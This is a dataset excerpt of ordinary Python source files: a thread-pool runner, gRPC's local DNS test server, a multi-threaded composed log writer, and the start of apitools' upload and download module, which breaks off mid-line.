Dataset columns: source (string, length 3 to 86 characters) · python (string, length 75 to 1.04M characters)
simple_thread_runner.py
import queue
import threading
from typing import Any, Callable, Iterable, Iterator, Optional

from loguru import logger


class SimpleThreadsRunner:
    """
    A simple threads runner. It spins up multiple threads to do I/O;
    performance is at least as good as a Queue producer/consumer, which
    works in an analogous fashion. Empty the queue after use.
    """
    SENTINEL = object()

    def __init__(self):
        self._queue = queue.Queue()
        self._lock = threading.RLock()
        self._threads = []

    def prepare_threads(self, num_workers: int, fn: Callable[..., Any]) -> None:
        """
        Threads are created only when this function is called, and terminate
        before it returns. They are there primarily to parallelize I/O
        (e.g. fetching web pages, downloading pictures, scrolling Elasticsearch).
        """
        for i in range(num_workers):
            t = threading.Thread(target=self.fetch, args=(fn,),
                                  name=f"child_thread_{i}", daemon=True)
            t.start()
            self._threads.append(t)

    def wait_threads(self) -> None:
        """
        Tell all the threads to terminate (by sending a sentinel value) and
        wait for them to do so.
        """
        # Note that you need two loops, since you can't say which
        # thread will get each sentinel.
        for _ in self._threads:
            self._queue.put(self.SENTINEL)  # sentinel
        for t in self._threads:
            t.join()
        self._threads = []

    def fetch(self, fn: Callable[..., Any]) -> None:
        """
        Get an item to process from the work queue. This is a handy method
        to run in a thread.
        """
        while True:
            try:
                _data: Iterable = self._queue.get_nowait()
                i = self._queue.qsize()
            except queue.Empty:
                # Queue drained; nothing left for this worker to do.
                break
            logger.info('Current thread running: %s ...'
                        % threading.current_thread().name)
            try:
                if _data is self.SENTINEL:
                    return
                fn(_data)
            except Exception as e:
                raise RuntimeError(
                    f'function {fn.__name__} execution failed: {e}') from e
            self._queue.task_done()
            logger.info(f"Tasks left: {i}")

    def q_producer(self, _data) -> None:
        self._queue.put(_data)

    def get_qsize(self) -> int:
        """Get the current size of the queue. Be aware this value changes
        frequently, as multiple threads may produce/consume data on the queue."""
        return self._queue.qsize()

    def q_consumer(self, num_workers: int, fn: Callable[..., Any]) -> None:
        """Can be used separately, together with q_producer."""
        with self._lock:
            try:
                self.prepare_threads(num_workers, fn)
            finally:
                self.wait_threads()

    def run_threads(self, num_workers: int, fn: Callable[..., Any],
                    iter_data: Iterator[Any],
                    batch_size: Optional[int] = None) -> None:
        """batch_size caps the queue size in case iter_data is huge."""
        for item in iter_data:
            self.q_producer(item)
            if batch_size and self.get_qsize() >= batch_size:
                self.q_consumer(num_workers, fn)
        if self.get_qsize() != 0:
            self.q_consumer(num_workers, fn)
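A minimal usage sketch (not part of the module; the fetch_page helper and the URL list are hypothetical): run_threads() fills the queue and lets a small pool of worker threads drain it.

import urllib.request

def fetch_page(url: str) -> None:
    # Illustrative I/O-bound task: download a page and report its size.
    with urllib.request.urlopen(url) as resp:
        print(url, resp.status, len(resp.read()))

if __name__ == "__main__":
    runner = SimpleThreadsRunner()
    urls = [f"https://example.com/page/{i}" for i in range(10)]
    # Four worker threads drain the queue; batch_size keeps the queue bounded.
    runner.run_threads(num_workers=4, fn=fetch_page,
                       iter_data=urls, batch_size=5)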
dns_server.py
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts a local DNS server for use in tests"""

import argparse
import sys
import yaml
import signal
import os
import threading
import time

import twisted
import twisted.internet
import twisted.internet.reactor
import twisted.internet.threads
import twisted.internet.defer
import twisted.internet.protocol
import twisted.names
import twisted.names.client
import twisted.names.dns
import twisted.names.server
from twisted.names import client, server, common, authority, dns
import platform

_SERVER_HEALTH_CHECK_RECORD_NAME = 'health-check-local-dns-server-is-alive.resolver-tests.grpctestingexp'  # missing end '.' for twisted syntax
_SERVER_HEALTH_CHECK_RECORD_DATA = '123.123.123.123'


class NoFileAuthority(authority.FileAuthority):

    def __init__(self, soa, records):
        # skip FileAuthority
        common.ResolverBase.__init__(self)
        self.soa = soa
        self.records = records


def start_local_dns_server(args):
    all_records = {}

    def _push_record(name, r):
        print('pushing record: |%s|' % name)
        if all_records.get(name) is not None:
            all_records[name].append(r)
            return
        all_records[name] = [r]

    def _maybe_split_up_txt_data(name, txt_data, r_ttl):
        start = 0
        txt_data_list = []
        while len(txt_data[start:]) > 0:
            next_read = len(txt_data[start:])
            if next_read > 255:
                next_read = 255
            txt_data_list.append(txt_data[start:start + next_read])
            start += next_read
        _push_record(name, dns.Record_TXT(*txt_data_list, ttl=r_ttl))

    with open(args.records_config_path) as config:
        test_records_config = yaml.load(config)
    common_zone_name = test_records_config['resolver_tests_common_zone_name']
    for group in test_records_config['resolver_component_tests']:
        for name in group['records'].keys():
            for record in group['records'][name]:
                r_type = record['type']
                r_data = record['data']
                r_ttl = int(record['TTL'])
                record_full_name = '%s.%s' % (name, common_zone_name)
                assert record_full_name[-1] == '.'
                record_full_name = record_full_name[:-1]
                if r_type == 'A':
                    _push_record(record_full_name,
                                 dns.Record_A(r_data, ttl=r_ttl))
                if r_type == 'AAAA':
                    _push_record(record_full_name,
                                 dns.Record_AAAA(r_data, ttl=r_ttl))
                if r_type == 'SRV':
                    p, w, port, target = r_data.split(' ')
                    p = int(p)
                    w = int(w)
                    port = int(port)
                    target_full_name = '%s.%s' % (target, common_zone_name)
                    r_data = '%s %s %s %s' % (p, w, port, target_full_name)
                    _push_record(
                        record_full_name,
                        dns.Record_SRV(p, w, port, target_full_name,
                                       ttl=r_ttl))
                if r_type == 'TXT':
                    _maybe_split_up_txt_data(record_full_name, r_data, r_ttl)
    # Add an optional IPv4 record if specified
    if args.add_a_record:
        extra_host, extra_host_ipv4 = args.add_a_record.split(':')
        _push_record(extra_host, dns.Record_A(extra_host_ipv4, ttl=0))
    # Server health check record
    _push_record(_SERVER_HEALTH_CHECK_RECORD_NAME,
                 dns.Record_A(_SERVER_HEALTH_CHECK_RECORD_DATA, ttl=0))
    soa_record = dns.Record_SOA(mname=common_zone_name)
    test_domain_com = NoFileAuthority(
        soa=(common_zone_name, soa_record),
        records=all_records,
    )
    server = twisted.names.server.DNSServerFactory(
        authorities=[test_domain_com], verbose=2)
    server.noisy = 2
    twisted.internet.reactor.listenTCP(args.port, server)
    dns_proto = twisted.names.dns.DNSDatagramProtocol(server)
    dns_proto.noisy = 2
    twisted.internet.reactor.listenUDP(args.port, dns_proto)
    print('starting local dns server on 127.0.0.1:%s' % args.port)
    print('starting twisted.internet.reactor')
    twisted.internet.reactor.suggestThreadPoolSize(1)
    twisted.internet.reactor.run()


def _quit_on_signal(signum, _frame):
    print('Received SIGNAL %d. Quitting with exit code 0' % signum)
    twisted.internet.reactor.stop()
    sys.stdout.flush()
    sys.exit(0)


def flush_stdout_loop():
    num_timeouts_so_far = 0
    sleep_time = 1
    # Prevent zombies. Tests that use this server are short-lived.
    max_timeouts = 60 * 10
    while num_timeouts_so_far < max_timeouts:
        sys.stdout.flush()
        time.sleep(sleep_time)
        num_timeouts_so_far += 1
    print('Process timeout reached, or cancelled. Exiting 0.')
    os.kill(os.getpid(), signal.SIGTERM)


def main():
    argp = argparse.ArgumentParser(
        description='Local DNS Server for resolver tests')
    argp.add_argument('-p', '--port', default=None, type=int,
                      help='Port for DNS server to listen on for TCP and UDP.')
    argp.add_argument(
        '-r',
        '--records_config_path',
        default=None,
        type=str,
        help=('Directory of resolver_test_record_groups.yaml file. '
              'Defaults to path needed when the test is invoked as part '
              'of run_tests.py.'))
    argp.add_argument(
        '--add_a_record',
        default=None,
        type=str,
        help=('Add an A record via the command line. Useful for when we '
              'need to serve a one-off A record that is under a '
              'different domain than the rest of the records configured in '
              '--records_config_path (which all need to be under the '
              'same domain). Format: <name>:<ipv4 address>'))
    args = argp.parse_args()
    signal.signal(signal.SIGTERM, _quit_on_signal)
    signal.signal(signal.SIGINT, _quit_on_signal)
    output_flush_thread = threading.Thread(target=flush_stdout_loop)
    output_flush_thread.setDaemon(True)
    output_flush_thread.start()
    start_local_dns_server(args)


if __name__ == '__main__':
    main()
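A hedged sketch of querying the server once it is running (the port, 15353, is illustrative; the resolver tests normally drive this script from run_tests.py). It uses Twisted's stock resolver client against 127.0.0.1 and looks up the built-in health-check record.

import sys

from twisted.internet import reactor
from twisted.names import client

def _print_answers(result):
    # lookupAddress fires with (answers, authority, additional) record lists.
    answers, authority, additional = result
    for rr in answers:
        sys.stdout.write('%s\n' % (rr,))

resolver = client.Resolver(servers=[('127.0.0.1', 15353)])
d = resolver.lookupAddress(
    'health-check-local-dns-server-is-alive.resolver-tests.grpctestingexp')
d.addCallback(_print_answers)
d.addBoth(lambda _: reactor.stop())  # stop whether or not the lookup succeeded
reactor.run()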
composed_writer.py
#!/usr/bin/env python3

import logging
import sys
import threading

from os.path import dirname, realpath
sys.path.append(dirname(dirname(dirname(realpath(__file__)))))

from logger.writers.writer import Writer  # noqa: E402
from logger.utils import formats  # noqa: E402


class ComposedWriter(Writer):
    ############################
    def __init__(self, transforms=[], writers=[], check_format=False):
        """
        Apply zero or more Transforms (in series) to passed records, then
        write them (in parallel threads) using the specified Writers.
        ```
        transforms     A single Transform, a list of Transforms, or None.

        writers        A single Writer or a list of Writers.

        check_format   If True, attempt to check that Transform/Writer
                       formats are compatible, and throw a ValueError if
                       they are not. If check_format is False (the default)
                       the output_format() of the whole reader will be
                       formats.Unknown.
        ```
        Example:
        ```
        writer = ComposedWriter(transforms=[TimestampTransform(),
                                            PrefixTransform('gyr1')],
                                writers=[NetworkWriter(':6221'),
                                         LogfileWriter('/logs/gyr1')],
                                check_format=True)
        ```
        NOTE: we make the rash assumption that transforms are thread-safe,
        that is, that no mischief or corrupted internal state will result if
        more than one thread calls a transform at the same time. To be
        thread-safe, a transform must protect any changes to its internal
        state with a non-re-entrant thread lock, as described in the
        threading module. We do *not* make this assumption of our writers,
        and impose a lock to prevent a writer's write() method from being
        called a second time if the first has not yet completed.
        """
        # Make transforms a list if it's not. Even if it's only one transform.
        if not isinstance(transforms, list):
            self.transforms = [transforms]
        else:
            self.transforms = transforms

        # Make writers a list if it's not. Even if it's only one writer.
        if not isinstance(writers, list):
            self.writers = [writers]
        else:
            self.writers = writers

        # One lock per writer, to prevent us from accidental re-entry if a
        # new write is requested before the previous one has completed.
        self.writer_lock = [threading.Lock() for w in self.writers]
        self.exceptions = [None for w in self.writers]

        # If they want, check that our writers and transforms have
        # compatible input/output formats.
        input_format = formats.Unknown
        if check_format:
            input_format = self._check_writer_formats()
            if not input_format:
                raise ValueError('ComposedWriter: No common format found '
                                 'for passed transforms (%s) and writers (%s)'
                                 % (self.transforms, self.writers))
        super().__init__(input_format=input_format)

    ############################
    def _run_writer(self, index, record):
        """Internal: grab the appropriate lock and call the appropriate
        write() method. If there's an exception, save it."""
        with self.writer_lock[index]:
            try:
                self.writers[index].write(record)
            except Exception as e:
                self.exceptions[index] = e

    ############################
    def apply_transforms(self, record):
        """Internal: apply the transforms in series."""
        if record:
            for t in self.transforms:
                record = t.transform(record)
                if not record:
                    break
        return record

    ############################
    def write(self, record):
        """Transform the passed record and dispatch it to writers."""
        # Transforms run in series
        record = self.apply_transforms(record)
        if record is None:
            return

        # No idea why someone would instantiate without writers, but it's
        # plausible. Try to be accommodating.
        if not self.writers:
            return

        # If we only have one writer, there's no point making things
        # complicated. Just write and return.
        if len(self.writers) == 1:
            self.writers[0].write(record)
            return

        # Fire record off to write() requests for each writer.
        writer_threads = []
        for i in range(len(self.writers)):
            try:
                writer_name = str(type(self.writers[i]))
                t = threading.Thread(target=self._run_writer,
                                     args=(i, record),
                                     name=writer_name, daemon=True)
                t.start()
            except (OSError, RuntimeError) as e:
                logging.error('ComposedWriter failed to write to %s: %s',
                              writer_name, e)
                t = None
            writer_threads.append(t)

        # Wait for all writes to complete
        for t in writer_threads:
            if t:
                t.join()

        # Were there any exceptions? Arbitrarily raise the first one in list
        exceptions = [e for e in self.exceptions if e]
        for e in exceptions:
            logging.error(e)
        if exceptions:
            raise exceptions[0]

    ############################
    def _check_writer_formats(self):
        """Check that Writer outputs are compatible with each other and with
        Transform inputs. Return None if not."""
        # Begin with output format of first transform and work way to end;
        # the output of each is input of next one.
        for i in range(1, len(self.transforms)):
            transform_input = self.transforms[i].input_format()
            previous_output = self.transforms[i - 1].output_format()
            if not transform_input.can_accept(previous_output):
                logging.error('Transform %s can not accept input format %s',
                              self.transforms[i], previous_output)
                return None

        # Make sure that all the writers can accept the output of the last
        # transform.
        if self.transforms:
            transform_output = self.transforms[-1].output_format()
            for writer in self.writers:
                if not writer.input_format().can_accept(transform_output):
                    logging.error('Writer %s can not accept input format %s',
                                  writer, transform_output)
                    return None

        # Finally, return the input_format that we can take.
        if self.transforms:
            return self.transforms[0].input_format()

        # If no transform, our input_format is the lowest common format of
        # our writers. If no writers, then we've got nothing - right?
        if not self.writers:
            logging.error('ComposedWriter has no transforms or writers?!?')
            return None

        lowest_common = self.writers[0].input_format()
        for writer in self.writers:
            lowest_common = writer.input_format().common(lowest_common)
            if not lowest_common:
                logging.error('No common input format among writers')
                return None
        return lowest_common
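A minimal sketch of the fan-out behavior (the stand-in transform and writers below are illustrative, not part of the surrounding logger package): the transform runs once in series, then each writer's write() is called on its own thread. With check_format left at its default of False, the stubs do not need input_format()/output_format() methods.

class UppercaseTransform:
    def transform(self, record):
        return record.upper()


class PrintWriter:
    def __init__(self, tag):
        self.tag = tag

    def write(self, record):
        print('%s: %s' % (self.tag, record))


writer = ComposedWriter(transforms=[UppercaseTransform()],
                        writers=[PrintWriter('net'), PrintWriter('file')])
writer.write('hello')  # both PrintWriters receive 'HELLO', each on its own thread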
transfer.py
#!/usr/bin/env python # # Copyright 2015 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Upload and download support for apitools.""" from __future__ import print_function import email.generator as email_generator import email.mime.multipart as mime_multipart import email.mime.nonmultipart as mime_nonmultipart import io import json import mimetypes import os import threading import six from six.moves import http_client from apitools.base.py import buffered_stream from apitools.base.py import exceptions from apitools.base.py import http_wrapper from apitools.base.py import stream_slice from apitools.base.py import util __all__ = [ 'Download', 'Upload', 'RESUMABLE_UPLOAD', 'SIMPLE_UPLOAD', 'DownloadProgressPrinter', 'DownloadCompletePrinter', 'UploadProgressPrinter', 'UploadCompletePrinter', ] _RESUMABLE_UPLOAD_THRESHOLD = 5 << 20 SIMPLE_UPLOAD = 'simple' RESUMABLE_UPLOAD = 'resumable' def DownloadProgressPrinter(response, unused_download): """Print download progress based on response.""" if 'content-range' in response.info: print('Received %s' % response.info['content-range']) else: print('Received %d bytes' % response.length) def DownloadCompletePrinter(unused_response, unused_download): """Print information about a completed download.""" print('Download complete') def UploadProgressPrinter(response, unused_upload): """Print upload progress based on response.""" print('Sent %s' % response.info['range']) def UploadCompletePrinter(unused_response, unused_upload): """Print information about a completed upload.""" print('Upload complete') class _Transfer(object): """Generic bits common to Uploads and Downloads.""" def __init__(self, stream, close_stream=False, chunksize=None, auto_transfer=True, http=None, num_retries=5): self.__bytes_http = None self.__close_stream = close_stream self.__http = http self.__stream = stream self.__url = None self.__num_retries = 5 # Let the @property do validation self.num_retries = num_retries self.retry_func = ( http_wrapper.HandleExceptionsAndRebuildHttpConnections) self.auto_transfer = auto_transfer self.chunksize = chunksize or 1048576 def __repr__(self): return str(self) @property def close_stream(self): return self.__close_stream @property def http(self): return self.__http @property def bytes_http(self): return self.__bytes_http or self.http @bytes_http.setter def bytes_http(self, value): self.__bytes_http = value @property def num_retries(self): return self.__num_retries @num_retries.setter def num_retries(self, value): util.Typecheck(value, six.integer_types) if value < 0: raise exceptions.InvalidDataError( 'Cannot have negative value for num_retries') self.__num_retries = value @property def stream(self): return self.__stream @property def url(self): return self.__url def _Initialize(self, http, url): """Initialize this download by setting self.http and self.url. We want the user to be able to override self.http by having set the value in the constructor; in that case, we ignore the provided http. Args: http: An httplib2.Http instance or None. 
url: The url for this transfer. Returns: None. Initializes self. """ self.EnsureUninitialized() if self.http is None: self.__http = http or http_wrapper.GetHttp() self.__url = url @property def initialized(self): return self.url is not None and self.http is not None @property def _type_name(self): return type(self).__name__ def EnsureInitialized(self): if not self.initialized: raise exceptions.TransferInvalidError( 'Cannot use uninitialized %s', self._type_name) def EnsureUninitialized(self): if self.initialized: raise exceptions.TransferInvalidError( 'Cannot re-initialize %s', self._type_name) def __del__(self): if self.__close_stream: self.__stream.close() def _ExecuteCallback(self, callback, response): # TODO(craigcitro): Push these into a queue. if callback is not None: threading.Thread(target=callback, args=(response, self)).start() class Download(_Transfer): """Data for a single download. Public attributes: chunksize: default chunksize to use for transfers. """ _ACCEPTABLE_STATUSES = set(( http_client.OK, http_client.NO_CONTENT, http_client.PARTIAL_CONTENT, http_client.REQUESTED_RANGE_NOT_SATISFIABLE, )) _REQUIRED_SERIALIZATION_KEYS = set(( 'auto_transfer', 'progress', 'total_size', 'url')) def __init__(self, stream, progress_callback=None, finish_callback=None, **kwds): total_size = kwds.pop('total_size', None) super(Download, self).__init__(stream, **kwds) self.__initial_response = None self.__progress = 0 self.__total_size = total_size self.__encoding = None self.progress_callback = progress_callback self.finish_callback = finish_callback @property def progress(self): return self.__progress @property def encoding(self): return self.__encoding @classmethod def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds): """Create a new download object from a filename.""" path = os.path.expanduser(filename) if os.path.exists(path) and not overwrite: raise exceptions.InvalidUserInputError( 'File %s exists and overwrite not specified' % path) return cls(open(path, 'wb'), close_stream=True, auto_transfer=auto_transfer, **kwds) @classmethod def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds): """Create a new Download object from a stream.""" return cls(stream, auto_transfer=auto_transfer, total_size=total_size, **kwds) @classmethod def FromData(cls, stream, json_data, http=None, auto_transfer=None, **kwds): """Create a new Download object from a stream and serialized data.""" info = json.loads(json_data) missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys()) if missing_keys: raise exceptions.InvalidDataError( 'Invalid serialization data, missing keys: %s' % ( ', '.join(missing_keys))) download = cls.FromStream(stream, **kwds) if auto_transfer is not None: download.auto_transfer = auto_transfer else: download.auto_transfer = info['auto_transfer'] setattr(download, '_Download__progress', info['progress']) setattr(download, '_Download__total_size', info['total_size']) download._Initialize( # pylint: disable=protected-access http, info['url']) return download @property def serialization_data(self): self.EnsureInitialized() return { 'auto_transfer': self.auto_transfer, 'progress': self.progress, 'total_size': self.total_size, 'url': self.url, } @property def total_size(self): return self.__total_size def __str__(self): if not self.initialized: return 'Download (uninitialized)' return 'Download with %d/%s bytes transferred from url %s' % ( self.progress, self.total_size, self.url) def ConfigureRequest(self, http_request, url_builder): 
url_builder.query_params['alt'] = 'media' # TODO(craigcitro): We need to send range requests because by # default httplib2 stores entire reponses in memory. Override # httplib2's download method (as gsutil does) so that this is not # necessary. http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,) def __SetTotal(self, info): if 'content-range' in info: _, _, total = info['content-range'].rpartition('/') if total != '*': self.__total_size = int(total) # Note "total_size is None" means we don't know it; if no size # info was returned on our initial range request, that means we # have a 0-byte file. (That last statement has been verified # empirically, but is not clearly documented anywhere.) if self.total_size is None: self.__total_size = 0 def InitializeDownload(self, http_request, http=None, client=None): """Initialize this download by making a request. Args: http_request: The HttpRequest to use to initialize this download. http: The httplib2.Http instance for this request. client: If provided, let this client process the final URL before sending any additional requests. If client is provided and http is not, client.http will be used instead. """ self.EnsureUninitialized() if http is None and client is None: raise exceptions.UserError('Must provide client or http.') http = http or client.http if client is not None: http_request.url = client.FinalizeTransferUrl(http_request.url) url = http_request.url if self.auto_transfer: end_byte = self.__ComputeEndByte(0) self.__SetRangeHeader(http_request, 0, end_byte) response = http_wrapper.MakeRequest( self.bytes_http or http, http_request) if response.status_code not in self._ACCEPTABLE_STATUSES: raise exceptions.HttpError.FromResponse(response) self.__initial_response = response self.__SetTotal(response.info) url = response.info.get('content-location', response.request_url) if client is not None: url = client.FinalizeTransferUrl(url) self._Initialize(http, url) # Unless the user has requested otherwise, we want to just # go ahead and pump the bytes now. if self.auto_transfer: self.StreamInChunks() def __NormalizeStartEnd(self, start, end=None): if end is not None: if start < 0: raise exceptions.TransferInvalidError( 'Cannot have end index with negative start index') elif start >= self.total_size: raise exceptions.TransferInvalidError( 'Cannot have start index greater than total size') end = min(end, self.total_size - 1) if end < start: raise exceptions.TransferInvalidError( 'Range requested with end[%s] < start[%s]' % (end, start)) return start, end else: if start < 0: start = max(0, start + self.total_size) return start, self.total_size - 1 def __SetRangeHeader(self, request, start, end=None): if start < 0: request.headers['range'] = 'bytes=%d' % start elif end is None: request.headers['range'] = 'bytes=%d-' % start else: request.headers['range'] = 'bytes=%d-%d' % (start, end) def __ComputeEndByte(self, start, end=None, use_chunks=True): """Compute the last byte to fetch for this request. This is all based on the HTTP spec for Range and Content-Range. Note that this is potentially confusing in several ways: * the value for the last byte is 0-based, eg "fetch 10 bytes from the beginning" would return 9 here. * if we have no information about size, and don't want to use the chunksize, we'll return None. See the tests for more examples. Args: start: byte to start at. end: (int or None, default: None) Suggested last byte. use_chunks: (bool, default: True) If False, ignore self.chunksize. 
Returns: Last byte to use in a Range header, or None. """ end_byte = end if start < 0 and not self.total_size: return end_byte if use_chunks: alternate = start + self.chunksize - 1 if end_byte is not None: end_byte = min(end_byte, alternate) else: end_byte = alternate if self.total_size: alternate = self.total_size - 1 if end_byte is not None: end_byte = min(end_byte, alternate) else: end_byte = alternate return end_byte def __GetChunk(self, start, end, additional_headers=None): """Retrieve a chunk, and return the full response.""" self.EnsureInitialized() request = http_wrapper.Request(url=self.url) self.__SetRangeHeader(request, start, end=end) if additional_headers is not None: request.headers.update(additional_headers) return http_wrapper.MakeRequest( self.bytes_http, request, retry_func=self.retry_func, retries=self.num_retries) def __ProcessResponse(self, response): """Process response (by updating self and writing to self.stream).""" if response.status_code not in self._ACCEPTABLE_STATUSES: # We distinguish errors that mean we made a mistake in setting # up the transfer versus something we should attempt again. if response.status_code in (http_client.FORBIDDEN, http_client.NOT_FOUND): raise exceptions.HttpError.FromResponse(response) else: raise exceptions.TransferRetryError(response.content) if response.status_code in (http_client.OK, http_client.PARTIAL_CONTENT): self.stream.write(response.content) self.__progress += response.length if response.info and 'content-encoding' in response.info: # TODO(craigcitro): Handle the case where this changes over a # download. self.__encoding = response.info['content-encoding'] elif response.status_code == http_client.NO_CONTENT: # It's important to write something to the stream for the case # of a 0-byte download to a file, as otherwise python won't # create the file. self.stream.write('') return response def GetRange(self, start, end=None, additional_headers=None, use_chunks=True): """Retrieve a given byte range from this download, inclusive. Range must be of one of these three forms: * 0 <= start, end = None: Fetch from start to the end of the file. * 0 <= start <= end: Fetch the bytes from start to end. * start < 0, end = None: Fetch the last -start bytes of the file. (These variations correspond to those described in the HTTP 1.1 protocol for range headers in RFC 2616, sec. 14.35.1.) Args: start: (int) Where to start fetching bytes. (See above.) end: (int, optional) Where to stop fetching bytes. (See above.) additional_headers: (bool, optional) Any additional headers to pass with the request. use_chunks: (bool, default: True) If False, ignore self.chunksize and fetch this range in a single request. Returns: None. Streams bytes into self.stream. 
""" self.EnsureInitialized() progress_end_normalized = False if self.total_size is not None: progress, end_byte = self.__NormalizeStartEnd(start, end) progress_end_normalized = True else: progress = start end_byte = end while (not progress_end_normalized or end_byte is None or progress <= end_byte): end_byte = self.__ComputeEndByte(progress, end=end_byte, use_chunks=use_chunks) response = self.__GetChunk(progress, end_byte, additional_headers=additional_headers) if not progress_end_normalized: self.__SetTotal(response.info) progress, end_byte = self.__NormalizeStartEnd(start, end) progress_end_normalized = True response = self.__ProcessResponse(response) progress += response.length if response.length == 0: raise exceptions.TransferRetryError( 'Zero bytes unexpectedly returned in download response') def StreamInChunks(self, callback=None, finish_callback=None, additional_headers=None): """Stream the entire download in chunks.""" self.StreamMedia(callback=callback, finish_callback=finish_callback, additional_headers=additional_headers, use_chunks=True) def StreamMedia(self, callback=None, finish_callback=None, additional_headers=None, use_chunks=True): """Stream the entire download. Args: callback: (default: None) Callback to call as each chunk is completed. finish_callback: (default: None) Callback to call when the download is complete. additional_headers: (default: None) Additional headers to include in fetching bytes. use_chunks: (bool, default: True) If False, ignore self.chunksize and stream this download in a single request. Returns: None. Streams bytes into self.stream. """ callback = callback or self.progress_callback finish_callback = finish_callback or self.finish_callback self.EnsureInitialized() while True: if self.__initial_response is not None: response = self.__initial_response self.__initial_response = None else: end_byte = self.__ComputeEndByte(self.progress, use_chunks=use_chunks) response = self.__GetChunk( self.progress, end_byte, additional_headers=additional_headers) if self.total_size is None: self.__SetTotal(response.info) response = self.__ProcessResponse(response) self._ExecuteCallback(callback, response) if (response.status_code == http_client.OK or self.progress >= self.total_size): break self._ExecuteCallback(finish_callback, response) class Upload(_Transfer): """Data for a single Upload. Fields: stream: The stream to upload. mime_type: MIME type of the upload. total_size: (optional) Total upload size for the stream. close_stream: (default: False) Whether or not we should close the stream when finished with the upload. auto_transfer: (default: True) If True, stream all bytes as soon as the upload is created. 
""" _REQUIRED_SERIALIZATION_KEYS = set(( 'auto_transfer', 'mime_type', 'total_size', 'url')) def __init__(self, stream, mime_type, total_size=None, http=None, close_stream=False, chunksize=None, auto_transfer=True, progress_callback=None, finish_callback=None, **kwds): super(Upload, self).__init__( stream, close_stream=close_stream, chunksize=chunksize, auto_transfer=auto_transfer, http=http, **kwds) self.__complete = False self.__final_response = None self.__mime_type = mime_type self.__progress = 0 self.__server_chunk_granularity = None self.__strategy = None self.__total_size = None self.progress_callback = progress_callback self.finish_callback = finish_callback self.total_size = total_size @property def progress(self): return self.__progress @classmethod def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds): """Create a new Upload object from a filename.""" path = os.path.expanduser(filename) if not os.path.exists(path): raise exceptions.NotFoundError('Could not find file %s' % path) if not mime_type: mime_type, _ = mimetypes.guess_type(path) if mime_type is None: raise exceptions.InvalidUserInputError( 'Could not guess mime type for %s' % path) size = os.stat(path).st_size return cls(open(path, 'rb'), mime_type, total_size=size, close_stream=True, auto_transfer=auto_transfer, **kwds) @classmethod def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True, **kwds): """Create a new Upload object from a stream.""" if mime_type is None: raise exceptions.InvalidUserInputError( 'No mime_type specified for stream') return cls(stream, mime_type, total_size=total_size, close_stream=False, auto_transfer=auto_transfer, **kwds) @classmethod def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds): """Create a new Upload of stream from serialized json_data and http.""" info = json.loads(json_data) missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys()) if missing_keys: raise exceptions.InvalidDataError( 'Invalid serialization data, missing keys: %s' % ( ', '.join(missing_keys))) if 'total_size' in kwds: raise exceptions.InvalidUserInputError( 'Cannot override total_size on serialized Upload') upload = cls.FromStream(stream, info['mime_type'], total_size=info.get('total_size'), **kwds) if isinstance(stream, io.IOBase) and not stream.seekable(): raise exceptions.InvalidUserInputError( 'Cannot restart resumable upload on non-seekable stream') if auto_transfer is not None: upload.auto_transfer = auto_transfer else: upload.auto_transfer = info['auto_transfer'] upload.strategy = RESUMABLE_UPLOAD upload._Initialize( # pylint: disable=protected-access http, info['url']) upload.RefreshResumableUploadState() upload.EnsureInitialized() if upload.auto_transfer: upload.StreamInChunks() return upload @property def serialization_data(self): self.EnsureInitialized() if self.strategy != RESUMABLE_UPLOAD: raise exceptions.InvalidDataError( 'Serialization only supported for resumable uploads') return { 'auto_transfer': self.auto_transfer, 'mime_type': self.mime_type, 'total_size': self.total_size, 'url': self.url, } @property def complete(self): return self.__complete @property def mime_type(self): return self.__mime_type def __str__(self): if not self.initialized: return 'Upload (uninitialized)' return 'Upload with %d/%s bytes transferred for url %s' % ( self.progress, self.total_size or '???', self.url) @property def strategy(self): return self.__strategy @strategy.setter def strategy(self, value): if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD): raise 
exceptions.UserError(( 'Invalid value "%s" for upload strategy, must be one of ' '"simple" or "resumable".') % value) self.__strategy = value @property def total_size(self): return self.__total_size @total_size.setter def total_size(self, value): self.EnsureUninitialized() self.__total_size = value def __SetDefaultUploadStrategy(self, upload_config, http_request): """Determine and set the default upload strategy for this upload. We generally prefer simple or multipart, unless we're forced to use resumable. This happens when any of (1) the upload is too large, (2) the simple endpoint doesn't support multipart requests and we have metadata, or (3) there is no simple upload endpoint. Args: upload_config: Configuration for the upload endpoint. http_request: The associated http request. Returns: None. """ if upload_config.resumable_path is None: self.strategy = SIMPLE_UPLOAD if self.strategy is not None: return strategy = SIMPLE_UPLOAD if (self.total_size is not None and self.total_size > _RESUMABLE_UPLOAD_THRESHOLD): strategy = RESUMABLE_UPLOAD if http_request.body and not upload_config.simple_multipart: strategy = RESUMABLE_UPLOAD if not upload_config.simple_path: strategy = RESUMABLE_UPLOAD self.strategy = strategy def ConfigureRequest(self, upload_config, http_request, url_builder): """Configure the request and url for this upload.""" # Validate total_size vs. max_size if (self.total_size and upload_config.max_size and self.total_size > upload_config.max_size): raise exceptions.InvalidUserInputError( 'Upload too big: %s larger than max size %s' % ( self.total_size, upload_config.max_size)) # Validate mime type if not util.AcceptableMimeType(upload_config.accept, self.mime_type): raise exceptions.InvalidUserInputError( 'MIME type %s does not match any accepted MIME ranges %s' % ( self.mime_type, upload_config.accept)) self.__SetDefaultUploadStrategy(upload_config, 